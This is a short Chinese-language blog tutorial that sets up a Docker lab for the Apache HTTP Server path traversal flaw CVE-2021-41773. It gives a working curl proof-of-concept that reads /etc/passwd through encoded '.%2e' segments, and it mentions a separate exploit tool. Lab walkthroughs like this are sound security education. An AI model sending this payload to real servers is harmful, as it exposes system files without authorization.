当前位置: 首页 > news >正文

常见中间件漏洞攻略-Apache篇

news 2025/7/3 15:15:29
漏洞名称:Apache HTTP Server 路径穿越漏洞-CVE-2021-41773
第一步:拉取环境、启动环境

#拉取环境
docker pull blueteamsteve/cve-2021-41773:no-cgidhttp://121.40.229.129:8080

#启动环境
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
第二步:访问靶场

http://47.103.81.25:8080/
第三步:使用poc

#poc
curl http://47.103.81.25:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
第四步:准备工具CVE-2021-41773.exe,双击运行进行漏洞验证

                                                                                                                        FROM  IYU_

http://www.dtcms.com/a/86378.html

相关文章:

  • datetime“陷阱”与救赎:扒“时间差值”证道
  • Pytorch实现之对称卷积神经网络结构实现超分辨率
  • Pytorch深度学习教程_9_nn模块构建神经网络
  • 数据结构——哈夫曼编码、哈夫曼树
  • SAP-ABAP:SAP BW模块架构与实战应用详解
  • 使用Python将视频转化为gif
  • AF3 Rotation 类解读
  • stc8g1k08a+cd4017红绿灯
  • 嵌入式学习(31)-Lora模块A39C-T400A30D1a
  • 数据结构5(初):续写排序
  • HarmonyOS NEXT(九) :图形渲染体系
  • 嵌入式八股文学习——STL相关内容学习
  • 测试专项4:AI算法测试在测试行业中,该如何定位自己自述
  • 地理编码/经纬度解析/经纬度地址转换接口如何用JAVA对接
  • ui_auto_study(持续更新)
  • 当今前沿科技:改变世界的最新技术趋势
  • 【Spring】深入理解 Spring 事务管理
  • VScode
  • Java 中的多线程:核心概念与应用场景
  • 机器学习——KNN数据均一化
  • Qt文件管理系统
  • Spring AI相关的面试题
  • 算法如何测试,如果数据量很大怎么办?
  • 逆波兰表达式
  • [Lc17_多源 BFS_最短路] 矩阵 | 飞地的数量 | 地图中的最高点 | 地图分析
  • 串口接收不到数据,串口RX配置(f407),f103和f407的区别
  • Linux第二章第三章练习
  • python总结
  • 微调这件小事:训练集中的输入数据该作为instruction还是input?从LLaMA-Factory的源码中寻找答案吧~
  • 深度学习框架PyTorch——从入门到精通(8)保存并加载模型